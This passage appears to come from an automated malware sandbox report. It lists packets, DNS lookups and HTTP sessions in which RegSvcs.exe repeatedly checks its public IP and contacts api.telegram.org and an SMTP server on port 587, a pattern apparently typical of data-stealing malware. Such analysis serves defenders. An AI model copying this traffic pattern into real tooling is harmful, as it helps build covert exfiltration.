Jan 11, 2025 06:49:33.524480104 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:33.637856960 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:33.672374964 CET  49904        587        192.168.2.9      3.130.71.34
Jan 11, 2025 06:49:33.677692890 CET  587          49904      3.130.71.34      192.168.2.9
Jan 11, 2025 06:49:33.677784920 CET  49904        587        192.168.2.9      3.130.71.34
Jan 11, 2025 06:49:33.916858912 CET  80           49938      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:33.918618917 CET  49943        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:33.918658018 CET  443          49943      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:33.918740988 CET  49943        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:33.918965101 CET  49943        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:33.918978930 CET  443          49943      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:33.964144945 CET  49938        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:34.398863077 CET  443          49943      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:34.400639057 CET  49943        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:34.400676012 CET  443          49943      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:34.531559944 CET  443          49943      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:34.531733990 CET  443          49943      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:34.531795025 CET  49943        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:34.532067060 CET  49943        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:34.535142899 CET  49938        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:34.536091089 CET  49948        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:34.540957928 CET  80           49948      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:34.541043997 CET  49948        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:34.541174889 CET  49948        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:34.545916080 CET  80           49948      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:34.546538115 CET  80           49938      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:34.546588898 CET  49938        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:35.203424931 CET  80           49948      193.122.6.168    192.168.2.9
Jan 11, 2025 06:49:35.204889059 CET  49953        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:35.204989910 CET  443          49953      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:35.205070972 CET  49953        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:35.205331087 CET  49953        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:35.205348969 CET  443          49953      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:35.245407104 CET  49948        80         192.168.2.9      193.122.6.168
Jan 11, 2025 06:49:35.658087969 CET  443          49953      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:35.663733006 CET  49953        443        192.168.2.9      104.21.32.1
Jan 11, 2025 06:49:35.663762093 CET  443          49953      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:35.794882059 CET  443          49953      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:35.794951916 CET  443          49953      104.21.32.1      192.168.2.9
Jan 11, 2025 06:49:35.795088053 CET  49953        443        192.168.2.9      104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:35.795615911 CET49953443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:35.806983948 CET4994880192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:35.808193922 CET4995780192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:35.811893940 CET8049948193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:35.811939955 CET4994880192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:35.813018084 CET8049957193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:35.813944101 CET4995780192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:35.814078093 CET4995780192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:35.818865061 CET8049957193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:36.440383911 CET8049957193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:36.441488028 CET49963443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:36.441524029 CET44349963104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:36.441596031 CET49963443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:36.441827059 CET49963443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:36.441836119 CET44349963104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:36.495573997 CET4995780192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:36.901022911 CET44349963104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:36.912805080 CET49963443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:36.912837982 CET44349963104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.046880960 CET44349963104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.047045946 CET44349963104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.047096014 CET49963443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:37.047528028 CET49963443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:37.059282064 CET4995780192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:37.059757948 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.059791088 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.059859037 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.060324907 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.060336113 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.064215899 CET8049957193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.064547062 CET4995780192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:37.685091972 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.685173035 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.686539888 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.686546087 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.686942101 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.688385010 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.731332064 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.930617094 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.930681944 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.931358099 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.933248043 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:43.127897978 CET4990680192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:43.265258074 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:43.270137072 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:43.270216942 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:43.792289972 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:43.792515993 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:43.797419071 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:44.080157995 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:44.080461979 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:44.085426092 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:48.199358940 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:48.200629950 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:48.205655098 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.112340927 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.112689972 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:52.117613077 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.232073069 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.232239008 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:52.237046957 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.352147102 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.352509022 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:52.357637882 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.357692957 CET50009587192.168.2.93.130.71.34
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:49:10.129051924 CET | 53075 | 53 | 192.168.2.9 | 1.1.1.1
Jan 11, 2025 06:49:10.136888027 CET | 53 | 53075 | 1.1.1.1 | 192.168.2.9
Jan 11, 2025 06:49:11.032289982 CET | 61807 | 53 | 192.168.2.9 | 1.1.1.1
Jan 11, 2025 06:49:11.039769888 CET | 53 | 61807 | 1.1.1.1 | 192.168.2.9
Jan 11, 2025 06:49:21.545439959 CET | 60088 | 53 | 192.168.2.9 | 1.1.1.1
Jan 11, 2025 06:49:21.552520037 CET | 53 | 60088 | 1.1.1.1 | 192.168.2.9
Jan 11, 2025 06:49:29.031821012 CET | 55332 | 53 | 192.168.2.9 | 1.1.1.1
Jan 11, 2025 06:49:29.043900013 CET | 53 | 55332 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 06:49:10.129051924 CET | 192.168.2.9 | 1.1.1.1 | 0xa598 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:11.032289982 CET | 192.168.2.9 | 1.1.1.1 | 0xe363 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:21.545439959 CET | 192.168.2.9 | 1.1.1.1 | 0xac23 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:29.031821012 CET | 192.168.2.9 | 1.1.1.1 | 0xc5e9 | Standard query (0) | mail.acadental.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 06:48:59.905117989 CET | 1.1.1.1 | 192.168.2.9 | 0x7ea | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:48:59.905117989 CET | 1.1.1.1 | 192.168.2.9 | 0x7ea | No error (0) | s-part-0017.t-0009.t-msedge.net |  | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:10.136888027 CET | 1.1.1.1 | 192.168.2.9 | 0xa598 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:49:10.136888027 CET | 1.1.1.1 | 192.168.2.9 | 0xa598 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:10.136888027 CET | 1.1.1.1 | 192.168.2.9 | 0xa598 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:10.136888027 CET | 1.1.1.1 | 192.168.2.9 | 0xa598 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:10.136888027 CET | 1.1.1.1 | 192.168.2.9 | 0xa598 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:10.136888027 CET | 1.1.1.1 | 192.168.2.9 | 0xa598 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:11.039769888 CET | 1.1.1.1 | 192.168.2.9 | 0xe363 | No error (0) | reallyfreegeoip.org |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:11.039769888 CET | 1.1.1.1 | 192.168.2.9 | 0xe363 | No error (0) | reallyfreegeoip.org |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:11.039769888 CET | 1.1.1.1 | 192.168.2.9 | 0xe363 | No error (0) | reallyfreegeoip.org |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:11.039769888 CET | 1.1.1.1 | 192.168.2.9 | 0xe363 | No error (0) | reallyfreegeoip.org |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:11.039769888 CET | 1.1.1.1 | 192.168.2.9 | 0xe363 | No error (0) | reallyfreegeoip.org |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:11.039769888 CET | 1.1.1.1 | 192.168.2.9 | 0xe363 | No error (0) | reallyfreegeoip.org |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:11.039769888 CET | 1.1.1.1 | 192.168.2.9 | 0xe363 | No error (0) | reallyfreegeoip.org |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:21.552520037 CET | 1.1.1.1 | 192.168.2.9 | 0xac23 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:29.043900013 CET | 1.1.1.1 | 192.168.2.9 | 0xc5e9 | No error (0) | mail.acadental.com |  | 3.130.71.34 | A (IP address) | IN (0x0001) | false
                                                                                                                      • reallyfreegeoip.org
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49764 | 193.122.6.168 | 80 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:10.148556948 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 06:49:10.793009996 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:10 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 06:49:10.798657894 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 06:49:10.987989902 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:10 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 06:49:11.711788893 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 06:49:11.901462078 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49782 | 193.122.6.168 | 80 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:12.524004936 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 06:49:13.154721022 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:13 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49792 | 193.122.6.168 | 80 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:13.775276899 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 06:49:14.401853085 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:14 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.949801193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:15.028100967 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:15.689186096 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:15 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.949813193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:16.300710917 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:16.931375980 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.949821193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:17.581176996 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:18.215591908 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:18 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.949832193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:18.851454020 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:19.550322056 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:19 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.949845193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:20.262974024 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:20.904129982 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:20 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.949883193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:25.898000002 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:26.523422003 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:26 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 11, 2025 06:49:26.527600050 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:26.714131117 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:26 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 11, 2025 06:49:27.411701918 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:27.597522974 CET273INHTTP/1.1 200 OK
